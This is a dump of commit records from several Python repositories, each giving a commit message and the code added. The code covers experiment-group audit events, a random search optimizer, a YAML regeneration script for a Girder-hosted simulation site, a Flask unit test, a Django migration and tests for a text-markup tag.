class ExperimentGroupCreatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_CREATED
class ExperimentGroupUpdatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_UPDATED
class ExperimentGroupDeletedEvent(Event):
type = event_types.EXPERIMENT_GROUP_DELETED
class ExperimentGroupViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_VIEWED
class ExperimentGroupStoppedEvent(Event):
type = event_types.EXPERIMENT_GROUP_STOPPED
class ExperimentGroupResumedEvent(Event):
type = event_types.EXPERIMENT_GROUP_RESUMED
class ExperimentGroupFinishedEvent(Event):
type = event_types.EXPERIMENT_GROUP_FINISHED
class ExperimentGroupIterationEvent(Event):
type = event_types.EXPERIMENT_GROUP_ITERATION
class ExperimentGroupExperimentsViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_EXPERIMENTS
class ExperimentGroupRandomEvent(Event):
type = event_types.EXPERIMENT_GROUP_RANDOM
class ExperimentGroupGridEvent(Event):
type = event_types.EXPERIMENT_GROUP_GRID
class ExperimentGroupHyperbandEvent(Event):
type = event_types.EXPERIMENT_GROUP_HYPERBAND
class ExperimentGroupBOEvent(Event):
type = event_types.EXPERIMENT_GROUP_BO
auditor.register(ExperimentGroupCreatedEvent)
auditor.register(ExperimentGroupUpdatedEvent)
auditor.register(ExperimentGroupDeletedEvent)
auditor.register(ExperimentGroupViewedEvent)
auditor.register(ExperimentGroupStoppedEvent)
auditor.register(ExperimentGroupResumedEvent)
auditor.register(ExperimentGroupFinishedEvent)
auditor.register(ExperimentGroupExperimentsViewedEvent)
auditor.register(ExperimentGroupIterationEvent)
auditor.register(ExperimentGroupRandomEvent)
auditor.register(ExperimentGroupGridEvent)
auditor.register(ExperimentGroupHyperbandEvent)
auditor.register(ExperimentGroupBOEvent)
|
<commit_before><commit_msg>Add auditor experiment group's events<commit_after>
|
import auditor
from libs.event_manager import event_types
from libs.event_manager.event import Event
class ExperimentGroupCreatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_CREATED
class ExperimentGroupUpdatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_UPDATED
class ExperimentGroupDeletedEvent(Event):
type = event_types.EXPERIMENT_GROUP_DELETED
class ExperimentGroupViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_VIEWED
class ExperimentGroupStoppedEvent(Event):
type = event_types.EXPERIMENT_GROUP_STOPPED
class ExperimentGroupResumedEvent(Event):
type = event_types.EXPERIMENT_GROUP_RESUMED
class ExperimentGroupFinishedEvent(Event):
type = event_types.EXPERIMENT_GROUP_FINISHED
class ExperimentGroupIterationEvent(Event):
type = event_types.EXPERIMENT_GROUP_ITERATION
class ExperimentGroupExperimentsViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_EXPERIMENTS
class ExperimentGroupRandomEvent(Event):
type = event_types.EXPERIMENT_GROUP_RANDOM
class ExperimentGroupGridEvent(Event):
type = event_types.EXPERIMENT_GROUP_GRID
class ExperimentGroupHyperbandEvent(Event):
type = event_types.EXPERIMENT_GROUP_HYPERBAND
class ExperimentGroupBOEvent(Event):
type = event_types.EXPERIMENT_GROUP_BO
auditor.register(ExperimentGroupCreatedEvent)
auditor.register(ExperimentGroupUpdatedEvent)
auditor.register(ExperimentGroupDeletedEvent)
auditor.register(ExperimentGroupViewedEvent)
auditor.register(ExperimentGroupStoppedEvent)
auditor.register(ExperimentGroupResumedEvent)
auditor.register(ExperimentGroupFinishedEvent)
auditor.register(ExperimentGroupExperimentsViewedEvent)
auditor.register(ExperimentGroupIterationEvent)
auditor.register(ExperimentGroupRandomEvent)
auditor.register(ExperimentGroupGridEvent)
auditor.register(ExperimentGroupHyperbandEvent)
auditor.register(ExperimentGroupBOEvent)
|
Add auditor experiment group's eventsimport auditor
from libs.event_manager import event_types
from libs.event_manager.event import Event
class ExperimentGroupCreatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_CREATED
class ExperimentGroupUpdatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_UPDATED
class ExperimentGroupDeletedEvent(Event):
type = event_types.EXPERIMENT_GROUP_DELETED
class ExperimentGroupViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_VIEWED
class ExperimentGroupStoppedEvent(Event):
type = event_types.EXPERIMENT_GROUP_STOPPED
class ExperimentGroupResumedEvent(Event):
type = event_types.EXPERIMENT_GROUP_RESUMED
class ExperimentGroupFinishedEvent(Event):
type = event_types.EXPERIMENT_GROUP_FINISHED
class ExperimentGroupIterationEvent(Event):
type = event_types.EXPERIMENT_GROUP_ITERATION
class ExperimentGroupExperimentsViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_EXPERIMENTS
class ExperimentGroupRandomEvent(Event):
type = event_types.EXPERIMENT_GROUP_RANDOM
class ExperimentGroupGridEvent(Event):
type = event_types.EXPERIMENT_GROUP_GRID
class ExperimentGroupHyperbandEvent(Event):
type = event_types.EXPERIMENT_GROUP_HYPERBAND
class ExperimentGroupBOEvent(Event):
type = event_types.EXPERIMENT_GROUP_BO
auditor.register(ExperimentGroupCreatedEvent)
auditor.register(ExperimentGroupUpdatedEvent)
auditor.register(ExperimentGroupDeletedEvent)
auditor.register(ExperimentGroupViewedEvent)
auditor.register(ExperimentGroupStoppedEvent)
auditor.register(ExperimentGroupResumedEvent)
auditor.register(ExperimentGroupFinishedEvent)
auditor.register(ExperimentGroupExperimentsViewedEvent)
auditor.register(ExperimentGroupIterationEvent)
auditor.register(ExperimentGroupRandomEvent)
auditor.register(ExperimentGroupGridEvent)
auditor.register(ExperimentGroupHyperbandEvent)
auditor.register(ExperimentGroupBOEvent)
|
<commit_before><commit_msg>Add auditor experiment group's events<commit_after>import auditor
from libs.event_manager import event_types
from libs.event_manager.event import Event
class ExperimentGroupCreatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_CREATED
class ExperimentGroupUpdatedEvent(Event):
type = event_types.EXPERIMENT_GROUP_UPDATED
class ExperimentGroupDeletedEvent(Event):
type = event_types.EXPERIMENT_GROUP_DELETED
class ExperimentGroupViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_VIEWED
class ExperimentGroupStoppedEvent(Event):
type = event_types.EXPERIMENT_GROUP_STOPPED
class ExperimentGroupResumedEvent(Event):
type = event_types.EXPERIMENT_GROUP_RESUMED
class ExperimentGroupFinishedEvent(Event):
type = event_types.EXPERIMENT_GROUP_FINISHED
class ExperimentGroupIterationEvent(Event):
type = event_types.EXPERIMENT_GROUP_ITERATION
class ExperimentGroupExperimentsViewedEvent(Event):
type = event_types.EXPERIMENT_GROUP_EXPERIMENTS
class ExperimentGroupRandomEvent(Event):
type = event_types.EXPERIMENT_GROUP_RANDOM
class ExperimentGroupGridEvent(Event):
type = event_types.EXPERIMENT_GROUP_GRID
class ExperimentGroupHyperbandEvent(Event):
type = event_types.EXPERIMENT_GROUP_HYPERBAND
class ExperimentGroupBOEvent(Event):
type = event_types.EXPERIMENT_GROUP_BO
auditor.register(ExperimentGroupCreatedEvent)
auditor.register(ExperimentGroupUpdatedEvent)
auditor.register(ExperimentGroupDeletedEvent)
auditor.register(ExperimentGroupViewedEvent)
auditor.register(ExperimentGroupStoppedEvent)
auditor.register(ExperimentGroupResumedEvent)
auditor.register(ExperimentGroupFinishedEvent)
auditor.register(ExperimentGroupExperimentsViewedEvent)
auditor.register(ExperimentGroupIterationEvent)
auditor.register(ExperimentGroupRandomEvent)
auditor.register(ExperimentGroupGridEvent)
auditor.register(ExperimentGroupHyperbandEvent)
auditor.register(ExperimentGroupBOEvent)
|
|
d58f249191f3e7746d68317c9fccc5a92601b8d0
|
metaopt/optimizer/randomsearch.py
|
metaopt/optimizer/randomsearch.py
|
# -*- coding: utf-8 -*-
# Future
from __future__ import absolute_import, division, print_function, \
unicode_literals, with_statement
# First Party
from metaopt.core.arg.util.creator import ArgsCreator
from metaopt.core.stoppable.util.exception import StoppedError
from metaopt.optimizer.optimizer import Optimizer
class RandomSearchOptimizer(Optimizer):
"""Optimizer that systematically tests parameters in a grid pattern."""
def __init__(self):
super(RandomSearchOptimizer, self).__init__()
self.best = (None, None)
def optimize(self, invoker, param_spec, return_spec=None):
args_creator = ArgsCreator(param_spec)
try:
while True:
args = args_creator.random()
invoker.invoke(self, args)
except StoppedError:
return self.best[0]
def on_result(self, value, fargs, **kwargs):
del kwargs
fitness = value
_, best_fitness = self.best
if best_fitness is None or fitness < best_fitness:
self.best = (fargs, fitness)
def on_error(self, value, fargs, **kwargs):
pass
|
Add first version of a random search optimizer
|
Add first version of a random search optimizer
|
Python
|
bsd-3-clause
|
cigroup-ol/metaopt,cigroup-ol/metaopt,cigroup-ol/metaopt
|
Add first version of a random search optimizer
|
# -*- coding: utf-8 -*-
# Future
from __future__ import absolute_import, division, print_function, \
unicode_literals, with_statement
# First Party
from metaopt.core.arg.util.creator import ArgsCreator
from metaopt.core.stoppable.util.exception import StoppedError
from metaopt.optimizer.optimizer import Optimizer
class RandomSearchOptimizer(Optimizer):
"""Optimizer that systematically tests parameters in a grid pattern."""
def __init__(self):
super(RandomSearchOptimizer, self).__init__()
self.best = (None, None)
def optimize(self, invoker, param_spec, return_spec=None):
args_creator = ArgsCreator(param_spec)
try:
while True:
args = args_creator.random()
invoker.invoke(self, args)
except StoppedError:
return self.best[0]
def on_result(self, value, fargs, **kwargs):
del kwargs
fitness = value
_, best_fitness = self.best
if best_fitness is None or fitness < best_fitness:
self.best = (fargs, fitness)
def on_error(self, value, fargs, **kwargs):
pass
|
<commit_before><commit_msg>Add first version of a random search optimizer<commit_after>
|
# -*- coding: utf-8 -*-
# Future
from __future__ import absolute_import, division, print_function, \
unicode_literals, with_statement
# First Party
from metaopt.core.arg.util.creator import ArgsCreator
from metaopt.core.stoppable.util.exception import StoppedError
from metaopt.optimizer.optimizer import Optimizer
class RandomSearchOptimizer(Optimizer):
"""Optimizer that systematically tests parameters in a grid pattern."""
def __init__(self):
super(RandomSearchOptimizer, self).__init__()
self.best = (None, None)
def optimize(self, invoker, param_spec, return_spec=None):
args_creator = ArgsCreator(param_spec)
try:
while True:
args = args_creator.random()
invoker.invoke(self, args)
except StoppedError:
return self.best[0]
def on_result(self, value, fargs, **kwargs):
del kwargs
fitness = value
_, best_fitness = self.best
if best_fitness is None or fitness < best_fitness:
self.best = (fargs, fitness)
def on_error(self, value, fargs, **kwargs):
pass
|
Add first version of a random search optimizer# -*- coding: utf-8 -*-
# Future
from __future__ import absolute_import, division, print_function, \
unicode_literals, with_statement
# First Party
from metaopt.core.arg.util.creator import ArgsCreator
from metaopt.core.stoppable.util.exception import StoppedError
from metaopt.optimizer.optimizer import Optimizer
class RandomSearchOptimizer(Optimizer):
"""Optimizer that systematically tests parameters in a grid pattern."""
def __init__(self):
super(RandomSearchOptimizer, self).__init__()
self.best = (None, None)
def optimize(self, invoker, param_spec, return_spec=None):
args_creator = ArgsCreator(param_spec)
try:
while True:
args = args_creator.random()
invoker.invoke(self, args)
except StoppedError:
return self.best[0]
def on_result(self, value, fargs, **kwargs):
del kwargs
fitness = value
_, best_fitness = self.best
if best_fitness is None or fitness < best_fitness:
self.best = (fargs, fitness)
def on_error(self, value, fargs, **kwargs):
pass
|
<commit_before><commit_msg>Add first version of a random search optimizer<commit_after># -*- coding: utf-8 -*-
# Future
from __future__ import absolute_import, division, print_function, \
unicode_literals, with_statement
# First Party
from metaopt.core.arg.util.creator import ArgsCreator
from metaopt.core.stoppable.util.exception import StoppedError
from metaopt.optimizer.optimizer import Optimizer
class RandomSearchOptimizer(Optimizer):
"""Optimizer that systematically tests parameters in a grid pattern."""
def __init__(self):
super(RandomSearchOptimizer, self).__init__()
self.best = (None, None)
def optimize(self, invoker, param_spec, return_spec=None):
args_creator = ArgsCreator(param_spec)
try:
while True:
args = args_creator.random()
invoker.invoke(self, args)
except StoppedError:
return self.best[0]
def on_result(self, value, fargs, **kwargs):
del kwargs
fitness = value
_, best_fitness = self.best
if best_fitness is None or fitness < best_fitness:
self.best = (fargs, fitness)
def on_error(self, value, fargs, **kwargs):
pass
|
|
53c4ab4ae1d463994f4b730295450b3297ecd094
|
tools/regenerate_yamls.py
|
tools/regenerate_yamls.py
|
import os
import yaml
import girder_client
rsl_page_root = os.environ.get(
'RSL_PAGE_ROOT', '/home/xarth/codes/rensimlab/rensimlab.github.io')
collectionPath = '/collection/Renaissance Simulations'
gc = girder_client.GirderClient(apiUrl='https://girder.rensimlab.xyz/api/v1')
server_paths = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'notebooks.yaml'), 'r'))
simulation_data = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'r'))
for sim_name, sim in simulation_data.items():
for ds in sim:
ds['on_rsl'] = False
listing = gc.get('/folder/{}/listing'.format(server_paths[sim_name]))
for folder in listing['folders']:
try:
pos = next((i for i, _ in enumerate(sim)
if folder['name'] == _['snapshot']))
sim[pos]['on_rsl'] = folder['_id']
except StopIteration:
pass
yaml.dump(
simulation_data,
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'w'))
rafts = [
{'id': _['_id'], 'name': _['name'], 'description': _['description']}
for _ in gc.get('/raft')
]
yaml.dump(
rafts,
open(os.path.join(rsl_page_root, '_data', 'rafts.yaml'), 'w'))
|
Add script for regenerating yaml files
|
Add script for regenerating yaml files
|
Python
|
mit
|
rensimlab/rensimlab.github.io,rensimlab/rensimlab.github.io,rensimlab/rensimlab.github.io
|
Add script for regenerating yaml files
|
import os
import yaml
import girder_client
rsl_page_root = os.environ.get(
'RSL_PAGE_ROOT', '/home/xarth/codes/rensimlab/rensimlab.github.io')
collectionPath = '/collection/Renaissance Simulations'
gc = girder_client.GirderClient(apiUrl='https://girder.rensimlab.xyz/api/v1')
server_paths = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'notebooks.yaml'), 'r'))
simulation_data = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'r'))
for sim_name, sim in simulation_data.items():
for ds in sim:
ds['on_rsl'] = False
listing = gc.get('/folder/{}/listing'.format(server_paths[sim_name]))
for folder in listing['folders']:
try:
pos = next((i for i, _ in enumerate(sim)
if folder['name'] == _['snapshot']))
sim[pos]['on_rsl'] = folder['_id']
except StopIteration:
pass
yaml.dump(
simulation_data,
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'w'))
rafts = [
{'id': _['_id'], 'name': _['name'], 'description': _['description']}
for _ in gc.get('/raft')
]
yaml.dump(
rafts,
open(os.path.join(rsl_page_root, '_data', 'rafts.yaml'), 'w'))
|
<commit_before><commit_msg>Add script for regenerating yaml files<commit_after>
|
import os
import yaml
import girder_client
rsl_page_root = os.environ.get(
'RSL_PAGE_ROOT', '/home/xarth/codes/rensimlab/rensimlab.github.io')
collectionPath = '/collection/Renaissance Simulations'
gc = girder_client.GirderClient(apiUrl='https://girder.rensimlab.xyz/api/v1')
server_paths = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'notebooks.yaml'), 'r'))
simulation_data = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'r'))
for sim_name, sim in simulation_data.items():
for ds in sim:
ds['on_rsl'] = False
listing = gc.get('/folder/{}/listing'.format(server_paths[sim_name]))
for folder in listing['folders']:
try:
pos = next((i for i, _ in enumerate(sim)
if folder['name'] == _['snapshot']))
sim[pos]['on_rsl'] = folder['_id']
except StopIteration:
pass
yaml.dump(
simulation_data,
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'w'))
rafts = [
{'id': _['_id'], 'name': _['name'], 'description': _['description']}
for _ in gc.get('/raft')
]
yaml.dump(
rafts,
open(os.path.join(rsl_page_root, '_data', 'rafts.yaml'), 'w'))
|
Add script for regenerating yaml filesimport os
import yaml
import girder_client
rsl_page_root = os.environ.get(
'RSL_PAGE_ROOT', '/home/xarth/codes/rensimlab/rensimlab.github.io')
collectionPath = '/collection/Renaissance Simulations'
gc = girder_client.GirderClient(apiUrl='https://girder.rensimlab.xyz/api/v1')
server_paths = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'notebooks.yaml'), 'r'))
simulation_data = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'r'))
for sim_name, sim in simulation_data.items():
for ds in sim:
ds['on_rsl'] = False
listing = gc.get('/folder/{}/listing'.format(server_paths[sim_name]))
for folder in listing['folders']:
try:
pos = next((i for i, _ in enumerate(sim)
if folder['name'] == _['snapshot']))
sim[pos]['on_rsl'] = folder['_id']
except StopIteration:
pass
yaml.dump(
simulation_data,
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'w'))
rafts = [
{'id': _['_id'], 'name': _['name'], 'description': _['description']}
for _ in gc.get('/raft')
]
yaml.dump(
rafts,
open(os.path.join(rsl_page_root, '_data', 'rafts.yaml'), 'w'))
|
<commit_before><commit_msg>Add script for regenerating yaml files<commit_after>import os
import yaml
import girder_client
rsl_page_root = os.environ.get(
'RSL_PAGE_ROOT', '/home/xarth/codes/rensimlab/rensimlab.github.io')
collectionPath = '/collection/Renaissance Simulations'
gc = girder_client.GirderClient(apiUrl='https://girder.rensimlab.xyz/api/v1')
server_paths = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'notebooks.yaml'), 'r'))
simulation_data = yaml.load(
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'r'))
for sim_name, sim in simulation_data.items():
for ds in sim:
ds['on_rsl'] = False
listing = gc.get('/folder/{}/listing'.format(server_paths[sim_name]))
for folder in listing['folders']:
try:
pos = next((i for i, _ in enumerate(sim)
if folder['name'] == _['snapshot']))
sim[pos]['on_rsl'] = folder['_id']
except StopIteration:
pass
yaml.dump(
simulation_data,
open(os.path.join(rsl_page_root, '_data', 'simulations.yaml'), 'w'))
rafts = [
{'id': _['_id'], 'name': _['name'], 'description': _['description']}
for _ in gc.get('/raft')
]
yaml.dump(
rafts,
open(os.path.join(rsl_page_root, '_data', 'rafts.yaml'), 'w'))
|
|
4d16656304b9702c124721e82ea0dcda3c40ae44
|
wqflask/tests/wqflask/test_collect.py
|
wqflask/tests/wqflask/test_collect.py
|
"""Test cases for some methods in collect.py"""
import unittest
import mock
from flask import Flask
from wqflask.collect import process_traits
app = Flask(__name__)
class MockSession:
"""Helper class for mocking wqflask.collect.g.user_session.logged_in"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def logged_in(self):
return self.is_logged_in
class MockFlaskG:
"""Helper class for mocking wqflask.collect.g.user_session"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def user_session(self):
if self.is_logged_in:
return MockSession(is_logged_in=True)
return MockSession()
class TestCollect(unittest.TestCase):
def setUp(self):
self.app_context = app.app_context()
self.app_context.push()
def tearDown(self):
self.app_context.pop()
@mock.patch("wqflask.collect.g", MockFlaskG())
def test_process_traits_when_user_is_logged_out(self):
"""
Test that the correct traits are returned when the user is logged
out
"""
self.assertEqual(process_traits(
b'1452452_at:HC_M2_0606_P:163d04f7db7c9e110de6,'
b'1452447_at:HC_M2_0606_P:eeece8fceb67072debea,'
b'1451401_a_at:HC_M2_0606_P:a043d23b3b3906d8318e,'
b'1429252_at:HC_M2_0606_P:6fa378b349bc9180e8f5'),
set(['1429252_at:HC_M2_0606_P',
'1451401_a_at:HC_M2_0606_P',
'1452447_at:HC_M2_0606_P',
'1452452_at:HC_M2_0606_P']))
|
Add test for process_traits from collections.py
|
Add test for process_traits from collections.py
* wqflask/tests/wqflask/test_collect.py: Add it.
|
Python
|
agpl-3.0
|
zsloan/genenetwork2,genenetwork/genenetwork2,pjotrp/genenetwork2,zsloan/genenetwork2,genenetwork/genenetwork2,pjotrp/genenetwork2,zsloan/genenetwork2,zsloan/genenetwork2,pjotrp/genenetwork2,genenetwork/genenetwork2,pjotrp/genenetwork2,pjotrp/genenetwork2,genenetwork/genenetwork2
|
Add test for process_traits from collections.py
* wqflask/tests/wqflask/test_collect.py: Add it.
|
"""Test cases for some methods in collect.py"""
import unittest
import mock
from flask import Flask
from wqflask.collect import process_traits
app = Flask(__name__)
class MockSession:
"""Helper class for mocking wqflask.collect.g.user_session.logged_in"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def logged_in(self):
return self.is_logged_in
class MockFlaskG:
"""Helper class for mocking wqflask.collect.g.user_session"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def user_session(self):
if self.is_logged_in:
return MockSession(is_logged_in=True)
return MockSession()
class TestCollect(unittest.TestCase):
def setUp(self):
self.app_context = app.app_context()
self.app_context.push()
def tearDown(self):
self.app_context.pop()
@mock.patch("wqflask.collect.g", MockFlaskG())
def test_process_traits_when_user_is_logged_out(self):
"""
Test that the correct traits are returned when the user is logged
out
"""
self.assertEqual(process_traits(
b'1452452_at:HC_M2_0606_P:163d04f7db7c9e110de6,'
b'1452447_at:HC_M2_0606_P:eeece8fceb67072debea,'
b'1451401_a_at:HC_M2_0606_P:a043d23b3b3906d8318e,'
b'1429252_at:HC_M2_0606_P:6fa378b349bc9180e8f5'),
set(['1429252_at:HC_M2_0606_P',
'1451401_a_at:HC_M2_0606_P',
'1452447_at:HC_M2_0606_P',
'1452452_at:HC_M2_0606_P']))
|
<commit_before><commit_msg>Add test for process_traits from collections.py
* wqflask/tests/wqflask/test_collect.py: Add it.<commit_after>
|
"""Test cases for some methods in collect.py"""
import unittest
import mock
from flask import Flask
from wqflask.collect import process_traits
app = Flask(__name__)
class MockSession:
"""Helper class for mocking wqflask.collect.g.user_session.logged_in"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def logged_in(self):
return self.is_logged_in
class MockFlaskG:
"""Helper class for mocking wqflask.collect.g.user_session"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def user_session(self):
if self.is_logged_in:
return MockSession(is_logged_in=True)
return MockSession()
class TestCollect(unittest.TestCase):
def setUp(self):
self.app_context = app.app_context()
self.app_context.push()
def tearDown(self):
self.app_context.pop()
@mock.patch("wqflask.collect.g", MockFlaskG())
def test_process_traits_when_user_is_logged_out(self):
"""
Test that the correct traits are returned when the user is logged
out
"""
self.assertEqual(process_traits(
b'1452452_at:HC_M2_0606_P:163d04f7db7c9e110de6,'
b'1452447_at:HC_M2_0606_P:eeece8fceb67072debea,'
b'1451401_a_at:HC_M2_0606_P:a043d23b3b3906d8318e,'
b'1429252_at:HC_M2_0606_P:6fa378b349bc9180e8f5'),
set(['1429252_at:HC_M2_0606_P',
'1451401_a_at:HC_M2_0606_P',
'1452447_at:HC_M2_0606_P',
'1452452_at:HC_M2_0606_P']))
|
Add test for process_traits from collections.py
* wqflask/tests/wqflask/test_collect.py: Add it."""Test cases for some methods in collect.py"""
import unittest
import mock
from flask import Flask
from wqflask.collect import process_traits
app = Flask(__name__)
class MockSession:
"""Helper class for mocking wqflask.collect.g.user_session.logged_in"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def logged_in(self):
return self.is_logged_in
class MockFlaskG:
"""Helper class for mocking wqflask.collect.g.user_session"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def user_session(self):
if self.is_logged_in:
return MockSession(is_logged_in=True)
return MockSession()
class TestCollect(unittest.TestCase):
def setUp(self):
self.app_context = app.app_context()
self.app_context.push()
def tearDown(self):
self.app_context.pop()
@mock.patch("wqflask.collect.g", MockFlaskG())
def test_process_traits_when_user_is_logged_out(self):
"""
Test that the correct traits are returned when the user is logged
out
"""
self.assertEqual(process_traits(
b'1452452_at:HC_M2_0606_P:163d04f7db7c9e110de6,'
b'1452447_at:HC_M2_0606_P:eeece8fceb67072debea,'
b'1451401_a_at:HC_M2_0606_P:a043d23b3b3906d8318e,'
b'1429252_at:HC_M2_0606_P:6fa378b349bc9180e8f5'),
set(['1429252_at:HC_M2_0606_P',
'1451401_a_at:HC_M2_0606_P',
'1452447_at:HC_M2_0606_P',
'1452452_at:HC_M2_0606_P']))
|
<commit_before><commit_msg>Add test for process_traits from collections.py
* wqflask/tests/wqflask/test_collect.py: Add it.<commit_after>"""Test cases for some methods in collect.py"""
import unittest
import mock
from flask import Flask
from wqflask.collect import process_traits
app = Flask(__name__)
class MockSession:
"""Helper class for mocking wqflask.collect.g.user_session.logged_in"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def logged_in(self):
return self.is_logged_in
class MockFlaskG:
"""Helper class for mocking wqflask.collect.g.user_session"""
def __init__(self, is_logged_in=False):
self.is_logged_in = is_logged_in
@property
def user_session(self):
if self.is_logged_in:
return MockSession(is_logged_in=True)
return MockSession()
class TestCollect(unittest.TestCase):
def setUp(self):
self.app_context = app.app_context()
self.app_context.push()
def tearDown(self):
self.app_context.pop()
@mock.patch("wqflask.collect.g", MockFlaskG())
def test_process_traits_when_user_is_logged_out(self):
"""
Test that the correct traits are returned when the user is logged
out
"""
self.assertEqual(process_traits(
b'1452452_at:HC_M2_0606_P:163d04f7db7c9e110de6,'
b'1452447_at:HC_M2_0606_P:eeece8fceb67072debea,'
b'1451401_a_at:HC_M2_0606_P:a043d23b3b3906d8318e,'
b'1429252_at:HC_M2_0606_P:6fa378b349bc9180e8f5'),
set(['1429252_at:HC_M2_0606_P',
'1451401_a_at:HC_M2_0606_P',
'1452447_at:HC_M2_0606_P',
'1452452_at:HC_M2_0606_P']))
|
|
6fcbdd225b3f7f47bd481ea63d7487b08c549625
|
src/apps/dive_log/migrations/0003_auto_20150131_0946.py
|
src/apps/dive_log/migrations/0003_auto_20150131_0946.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('dive_log', '0002_datapoint'),
]
operations = [
migrations.AlterModelOptions(
name='datapoint',
options={'ordering': ['second'], 'verbose_name': 'Datapunkt', 'verbose_name_plural': 'Datapunkter'},
),
]
|
Migrate sort order of datapoints
|
Migrate sort order of datapoints
|
Python
|
mit
|
GotlingSystem/apnea,GotlingSystem/apnea
|
Migrate sort order of datapoints
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('dive_log', '0002_datapoint'),
]
operations = [
migrations.AlterModelOptions(
name='datapoint',
options={'ordering': ['second'], 'verbose_name': 'Datapunkt', 'verbose_name_plural': 'Datapunkter'},
),
]
|
<commit_before><commit_msg>Migrate sort order of datapoints<commit_after>
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('dive_log', '0002_datapoint'),
]
operations = [
migrations.AlterModelOptions(
name='datapoint',
options={'ordering': ['second'], 'verbose_name': 'Datapunkt', 'verbose_name_plural': 'Datapunkter'},
),
]
|
Migrate sort order of datapoints# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('dive_log', '0002_datapoint'),
]
operations = [
migrations.AlterModelOptions(
name='datapoint',
options={'ordering': ['second'], 'verbose_name': 'Datapunkt', 'verbose_name_plural': 'Datapunkter'},
),
]
|
<commit_before><commit_msg>Migrate sort order of datapoints<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('dive_log', '0002_datapoint'),
]
operations = [
migrations.AlterModelOptions(
name='datapoint',
options={'ordering': ['second'], 'verbose_name': 'Datapunkt', 'verbose_name_plural': 'Datapunkter'},
),
]
|
|
e5a6329d5be5d570d43feabe2c3e58a0b86ae9b3
|
tests/tests_tags/tests_electronic.py
|
tests/tests_tags/tests_electronic.py
|
"""
SkCode electronic tag test code.
"""
import unittest
from skcode import (parse_skcode,
render_to_html,
render_to_text,
render_to_skcode)
from skcode.tags import (NotNotationTagOptions,
DEFAULT_RECOGNIZED_TAGS)
class NotNotationTagtestCase(unittest.TestCase):
""" Tests suite for the NOT notation tag module. """
def test_tag_and_aliases_in_default_recognized_tags_dict(self):
""" Test the presence of the tag and aliases in the dictionary of default recognized tags. """
self.assertIn('not', DEFAULT_RECOGNIZED_TAGS)
self.assertIsInstance(DEFAULT_RECOGNIZED_TAGS['not'], NotNotationTagOptions)
def test_tag_constant_values(self):
""" Test tag constants. """
opts = NotNotationTagOptions()
self.assertFalse(opts.newline_closes)
self.assertFalse(opts.same_tag_closes)
self.assertFalse(opts.standalone)
self.assertTrue(opts.parse_embedded)
self.assertFalse(opts.swallow_trailing_newline)
self.assertTrue(opts.inline)
self.assertFalse(opts.close_inlines)
self.assertFalse(opts.make_paragraphs_here)
def test_html_rendering(self):
""" Test HTML rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_html(document_tree)
expected_output = 'Pull the <span style="text-decoration:overline; text-transform: uppercase;">RESET</span> pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_text_rendering_auto_upper(self):
""" Test text rendering. """
document_tree = parse_skcode('Pull the [not]reset[/not] pin low to reset.')
rendered_output = render_to_text(document_tree)
expected_output = 'Pull the /RESET pin low to reset.'
self.assertEqual(expected_output, rendered_output)
def test_skcode_rendering(self):
""" Test SkCode rendering. """
document_tree = parse_skcode('Pull the [not]RESET[/not] pin low to reset.')
rendered_output = render_to_skcode(document_tree)
expected_output = 'Pull the [not]RESET[/not] pin low to reset.'
self.assertEqual(expected_output, rendered_output)
|
Add tests suite for electronic NOT tag.
|
Add tests suite for electronic NOT tag.
|
Python
|
agpl-3.0
|
